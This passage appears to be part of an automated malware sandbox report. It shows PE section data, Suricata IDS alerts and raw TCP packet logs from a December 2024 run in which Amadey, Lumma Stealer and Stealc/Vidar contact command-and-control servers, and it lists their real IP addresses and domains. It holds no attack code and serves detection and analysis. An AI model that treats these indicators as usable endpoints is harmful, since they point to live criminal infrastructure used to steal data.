amhigela	0x30f000	0x1000	0x400	f750b70a11977113f4cd41d8594d1f78	False	0.763671875	data	6.001316827931577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x310000	0x3000	0x2200	55b174cd0f153ee06ff2bd4e2314b9d6	False	0.06640625	DOS executable (COM)	0.7626896250369426	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-14T12:56:05.292058+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49748	185.215.113.43	80	TCP
2024-12-14T12:56:09.753300+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49760	31.41.244.11	80	TCP
2024-12-14T12:56:11.925525+0100	2058212	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)	1	192.168.2.4	59157	1.1.1.1	53	UDP
2024-12-14T12:56:13.058200+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49759	TCP
2024-12-14T12:56:13.470420+0100	2058213	ET MALWARE Observed Win32/Lumma Stealer Related Domain (bellflamre .click in TLS SNI)	1	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:13.470420+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:14.406820+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49772	185.215.113.43	80	TCP
2024-12-14T12:56:15.391916+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:15.391916+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:15.400163+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	51371	1.1.1.1	53	UDP
2024-12-14T12:56:15.940660+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49778	185.215.113.16	80	TCP
2024-12-14T12:56:16.933316+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:16.933316+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:18.702023+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:18.702023+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:18.712771+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	60444	1.1.1.1	53	UDP
2024-12-14T12:56:20.247561+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:56:20.247561+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:56:21.551360+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49794	185.215.113.43	80	TCP
2024-12-14T12:56:21.881846+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:56:21.881846+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:56:21.883337+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	62630	1.1.1.1	53	UDP
2024-12-14T12:56:22.152756+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	65102	1.1.1.1	53	UDP
2024-12-14T12:56:22.376421+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	49476	1.1.1.1	53	UDP
2024-12-14T12:56:22.605132+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	59059	1.1.1.1	53	UDP
2024-12-14T12:56:22.840895+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	60752	1.1.1.1	53	UDP
2024-12-14T12:56:23.015017+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49796	185.215.113.16	80	TCP
2024-12-14T12:56:23.129640+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	52224	1.1.1.1	53	UDP
2024-12-14T12:56:24.940548+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49804	23.55.153.106	443	TCP
2024-12-14T12:56:25.763387+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49804	23.55.153.106	443	TCP
2024-12-14T12:56:30.046266+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49823	185.215.113.43	80	TCP
2024-12-14T12:56:31.517643+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49827	185.215.113.16	80	TCP
2024-12-14T12:56:33.422758+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:33.871396+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:33.992412+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49834	TCP
2024-12-14T12:56:34.320749+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:34.634163+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49834	TCP
2024-12-14T12:56:35.962072+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:36.757164+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:40.234503+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49853	185.215.113.43	80	TCP
2024-12-14T12:56:41.921043+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49860	31.41.244.11	80	TCP
2024-12-14T12:56:53.354136+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49905	185.215.113.43	80	TCP
2024-12-14T12:56:54.514160+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:54.835915+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49913	31.41.244.11	80	TCP
2024-12-14T12:56:56.599198+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:58.131939+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:59.416469+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:00.174479+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49936	185.215.113.43	80	TCP
2024-12-14T12:57:01.498248+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49941	104.21.79.7	443	TCP
2024-12-14T12:57:01.640223+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49939	31.41.244.11	80	TCP
2024-12-14T12:57:02.213633+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49941	104.21.79.7	443	TCP
2024-12-14T12:57:02.213633+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49941	104.21.79.7	443	TCP
2024-12-14T12:57:02.215765+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	49239	1.1.1.1	53	UDP
2024-12-14T12:57:02.215765+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	49239	1.1.1.1	53	UDP
2024-12-14T12:57:02.436241+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	62810	1.1.1.1	53	UDP
2024-12-14T12:57:02.436241+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	62810	1.1.1.1	53	UDP
2024-12-14T12:57:02.676111+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	51431	1.1.1.1	53	UDP
2024-12-14T12:57:02.676111+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	51431	1.1.1.1	53	UDP
2024-12-14T12:57:02.905570+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	50441	1.1.1.1	53	UDP
2024-12-14T12:57:02.905570+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	50441	1.1.1.1	53	UDP
2024-12-14T12:57:02.973239+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:03.152787+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	49378	1.1.1.1	53	UDP
2024-12-14T12:57:03.152787+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	49378	1.1.1.1	53	UDP
2024-12-14T12:57:03.377174+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	56967	1.1.1.1	53	UDP
2024-12-14T12:57:03.377174+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	56967	1.1.1.1	53	UDP
2024-12-14T12:57:03.603609+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	59192	1.1.1.1	53	UDP
2024-12-14T12:57:03.603609+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	59192	1.1.1.1	53	UDP
2024-12-14T12:57:03.887452+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	63066	1.1.1.1	53	UDP
2024-12-14T12:57:03.887452+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	63066	1.1.1.1	53	UDP
2024-12-14T12:57:04.671453+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:06.039521+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49953	23.55.153.106	443	TCP
2024-12-14T12:57:06.347639+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49956	185.215.113.43	80	TCP
2024-12-14T12:57:06.810464+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49953	23.55.153.106	443	TCP
2024-12-14T12:57:07.809888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49961	31.41.244.11	80	TCP
2024-12-14T12:57:10.301976+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49970	31.41.244.11	80	TCP
2024-12-14T12:57:11.064296+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49975	185.215.113.16	80	TCP
2024-12-14T12:57:16.087731+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49989	116.203.10.31	443	TCP
2024-12-14T12:57:16.088218+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.10.31	443	192.168.2.4	49989	TCP
2024-12-14T12:57:18.391374+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.10.31	443	192.168.2.4	49996	TCP
2024-12-14T12:57:21.192873+0100	2044623	ET MALWARE Amadey Bot Activity (POST)	1	192.168.2.4	50007	185.215.113.43	80	TCP
2024-12-14T12:57:23.986787+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50021	185.215.113.206	80	TCP
2024-12-14T12:57:35.563087+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50085	185.215.113.206	80	TCP
2024-12-14T13:00:23.470760+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50241	TCP
2024-12-14T13:00:24.816012+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50243	185.215.113.43	80	TCP
2024-12-14T13:00:32.884921+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50245	185.215.113.206	80	TCP
2024-12-14T13:00:33.318085+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50246	185.215.113.43	80	TCP
2024-12-14T13:00:43.449904+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50248	185.215.113.43	80	TCP
2024-12-14T13:00:47.304272+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50250	185.215.113.206	80	TCP
2024-12-14T13:01:10.890658+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	50294	185.215.113.43	80	TCP
2024-12-14T13:01:11.566265+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50295	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 12:55:05.248709917 CET	49675	443	192.168.2.4	173.222.162.32
Dec 14, 2024 12:55:21.253330946 CET	49723	80	192.168.2.4	199.232.214.172
Dec 14, 2024 12:55:21.375854015 CET	80	49723	199.232.214.172	192.168.2.4
Dec 14, 2024 12:55:21.375926018 CET	49723	80	192.168.2.4	199.232.214.172
Dec 14, 2024 12:56:03.837001085 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:03.958744049 CET	80	49748	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:03.958849907 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:03.959017038 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:04.078978062 CET	80	49748	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:05.291898966 CET	80	49748	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:05.292057991 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:06.796452045 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:06.796921968 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:06.917031050 CET	80	49759	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:06.917074919 CET	80	49748	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:06.917273045 CET	49748	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:06.917278051 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:06.917507887 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:07.037440062 CET	80	49759	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:08.288912058 CET	80	49759	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:08.288979053 CET	49759	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:08.293432951 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:08.413353920 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:08.413671017 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:08.413773060 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:08.533876896 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.295977116 CET	49724	80	192.168.2.4	199.232.214.172
Dec 14, 2024 12:56:09.417773008 CET	80	49724	199.232.214.172	192.168.2.4
Dec 14, 2024 12:56:09.417853117 CET	49724	80	192.168.2.4	199.232.214.172
Dec 14, 2024 12:56:09.753144979 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753190994 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753227949 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753279924 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753299952 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753344059 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753371954 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753407001 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753429890 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753458023 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753489017 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753523111 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753545046 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753571987 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753592968 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753642082 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.753655910 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.753686905 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.873672009 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.873769045 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.873821974 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.873919010 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.877888918 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.878061056 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.878074884 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.878210068 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.945135117 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.945185900 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.945466042 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.949135065 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.949197054 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.949271917 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.949362993 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.957581043 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.957647085 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.957727909 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.957817078 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.966025114 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.966083050 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.966253996 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.974421024 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.974433899 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.974498034 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.974528074 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.982758045 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.982816935 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.982846975 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.982901096 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.991242886 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.991298914 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.991323948 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.991368055 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.999607086 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.999665022 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:09.999764919 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:09.999809980 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.008032084 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.008090019 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.008114100 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.008157969 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.016545057 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.016583920 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.016966105 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.023788929 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.023868084 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.023879051 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.023932934 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.031097889 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.031167030 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.031208038 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.031267881 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.137128115 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.137171984 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.137449026 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.139028072 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.139127016 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.139353037 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.146399021 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.146786928 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.146936893 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.147104025 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.153930902 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.153985023 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.154107094 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.161242008 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.161277056 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.161497116 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.166299105 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.166487932 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.166567087 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.166635990 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.170300961 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.170363903 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.170408010 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.170558929 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.174901962 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.174981117 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.175043106 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.175110102 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.179533958 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.179610014 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.179672003 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.179723978 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.185324907 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.185359955 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.185384989 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.185410023 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.189373016 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.189452887 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.189531088 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.189589977 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.193526983 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.193597078 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.193654060 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.193715096 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.198175907 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.198246002 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.198297977 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.198354006 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.202804089 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.202877045 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.202944040 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.203011036 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.209608078 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.209646940 CET	80	49760	31.41.244.11	192.168.2.4
